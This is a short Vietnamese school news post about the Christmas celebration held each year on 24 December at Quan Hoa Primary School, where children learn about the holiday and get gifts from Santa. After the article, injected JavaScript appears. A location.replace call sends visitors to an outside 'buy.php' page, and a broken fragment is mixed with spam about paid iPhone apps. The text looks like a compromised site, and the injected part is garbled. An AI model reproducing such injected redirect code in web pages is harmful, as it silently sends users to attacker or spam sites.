Lễ Giáng Sinh

02/01/2009 12:00 Sáng Phản hồi đã bị khóa

Ngày lễ Giáng sinh vốn thịnh hành ở các nước phương Tây, nhưng những năm gần đây, người dân ở các nước trên toàn thế giới đều biết đến và yêu thích ngày lễ này, đặc biệt là các em nhỏ. 

Ngày lễ Giáng sinh vốn thịnh hành ở các nước phương Tây, nhưng những năm gần đây, người dân ở các nước trên toàn thế giới đều biết đến và yêu thích ngày lễ này, đặc biệt là các em nhỏ. Ở Việt Nam ngày Nô-en được các em chờ đợi như ngày Tết Trung thu hay Tết Thiếu nhi. Đến ngày này, các em háo hức chờ đợi để được ông già Nô-en mang tặng những món quà yêu thích . Như thường lệ, ngày 24 tháng 12 hàng năm , trường Tiểu học Quan Hoa lại giành thời gian để tổ chức lễ Giáng sinh cho các em. Trong ngày vui này, các em được biết thêm nhiều điều, chẳng hạn tai sao có ngày Giáng Sinh, ông già Nô-en đi phát quà như thế nào?…và vui thích nhất là các em được nhận những món quà xinh xắn từ ông già Nô- en.

 

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) { Paid iphone apps check out this website without in-app purchases generated an average of $2

Các phản hồi đã bị đóng lại bở quản trị.